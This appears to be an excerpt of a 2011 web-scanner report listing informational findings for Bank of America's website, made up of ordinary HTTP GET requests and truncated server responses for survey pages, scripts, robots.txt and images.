HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Connection: close Set-Cookie: BIGipServerngen-www.80 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/popup_visit.cfm |
GET /surveys/popup_visit.cfm Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80 Content-Length: 7538 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN"> <html lang="en-US"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_popup |
GET /surveys/survey_popup Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80 Content-Length: 8802 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_select |
GET /surveys/survey_select Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6 Set-Cookie: SURVEY_SHOW_DETAILS=CTS Set-Cookie: BIGipServerngen-www.80 Content-Length: 735 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /weblinking/ |
GET /weblinking/?referredby Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:03 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80 Content-Length: 13092 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /weblinking/flyout/HM |
GET /weblinking/flyout/HM Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:05 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80 Content-Length: 13415 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /weblinking/main.css |
GET /weblinking/main.css HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:06 GMT Content-length: 530 Content-type: text/css Last-modified: Sat, 30 Oct 2010 12:19:04 GMT Etag: "212-4ccc0d38" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 #content { margin-top: 80px; width: 505px; margin-left: 10px; } #center-image { margin-left:535px; margin-top: -100px; margin-bottom: -50px; } /*WR 29116*/ #center-image1 { m ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/js/tc_logging |
GET /www/global/js/tc_logging Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:13 GMT Content-length: 12165 Content-type: application/x-javascript Last-modified: Sat, 03 Oct 2009 03:57:57 GMT Etag: "2f85-4ac6cbc5" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /* TouchClarity * Copyright (c) Omniture 2001-2007. All rights reserved. Patent Pending. * Privacy Policy at http://www.touchclarity */ /************************ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/js/tc |
GET /www/global/js/tc Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 22:43:34 GMT Content-length: 1825 Content-type: application/x-javascript Last-modified: Sat, 06 Sep 2008 09:35:49 GMT Etag: "721-48c24ef5" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 // Configurable throttle values. var throttle_percent_ngen = 100; var throttle_percent_olb = 100; var throttle_counter_active = false; var throttle_counter_percent = 0; // Default values tc_logging ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/mvc_objects |
GET /www/global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:57 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80 Content-Length: 13415 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/mvc_objects |
GET /www/global/mvc_objects Host: www.bankofamerica.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bankofamerica Cookie: BIGipServerngen-www.80 |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80 Content-Length: 13415 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/mvc_objects |
GET /www/global/mvc_objects Host: www.bankofamerica.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bankofamerica Cookie: BIGipServerngen-www.80 |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:57 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80 Content-Length: 13415 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/mvc_objects |
GET /global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:46 GMT Content-length: 46855 Content-type: application/x-javascript Last-modified: Mon, 23 Feb 2004 21:21:26 GMT Etag: "b707-403a6ed6" Accept-ranges: bytes /*HM_ScriptDOM.js * by Peter Belesis. v4.3 020605 * Copyright (c) 2002 Peter Belesis. All Rights Reserved. * Originally published and documented at http://www.dhtmlab.com/ * Available solely from INT Media Group. Incorporated under exclusive license. * Contact licensing@internet.com for more information. */ HM_IE5M = HM_IE && HM_Mac; HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko")); if(HM_Konqueror) HM_IE = false; HM_IE5W = HM_IE && !HM_Mac; HM_IEp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/js/tc |
GET /robots.txt HTTP/1.0 Host: www.bankofamerica.com |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 14:10:35 GMT Content-length: 1298 Content-type: text/plain Last-modified: Sat, 19 Mar 2011 19:08:31 GMT Accept-ranges: bytes Connection: close User-agent: * # applies to all robots Disallow: /global # disallow indexing of restricted areas Disallow: /cfdocs Disallow: /thirdparty Disallow: /directbenefits Disallow: /groupbanking ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys/bridge Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:35 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_VISITED_URLS Content-Length: 16269 <html lang="en-US"> <head> <script language="JavaScript" type="text/javascript"> <!-- var hParent = null; var ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/popup_visit.cfm |
GET /surveys/popup_visit.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close Set-Cookie: BIGipServerngen-www.80 <HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF"> <FORM ACTION="/cferror.cgi" METHOD=POST> <SCRIPT LA ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_popup |
GET /surveys/survey_popup Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:36 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Content-Length: 8802 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_select |
GET /surveys/survey_select Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:38 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6 Set-Cookie: SURVEY_SHOW_DETAILS=CTS Content-Length: 735 ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:37 GMT Content-length: 1406 Content-type: text/plain Last-modified: Thu, 01 Aug 2002 16:37:18 GMT Etag: "57e-3d4963be" Accept-ranges: bytes ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /global/images/new |
GET /global/images/new Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:19 GMT Content-length: 24065 Content-type: image/gif Last-modified: Sun, 25 Oct 2009 08:57:26 GMT Etag: "5e01-4ae412f6" Accept-ranges: bytes ......JFIF.....H.H.... .Exif..MM.*.............. ....'.. ....'.Adobe Photoshop CS3 Windows.2009:06:30 12:19:11......... ...[SNIP]... |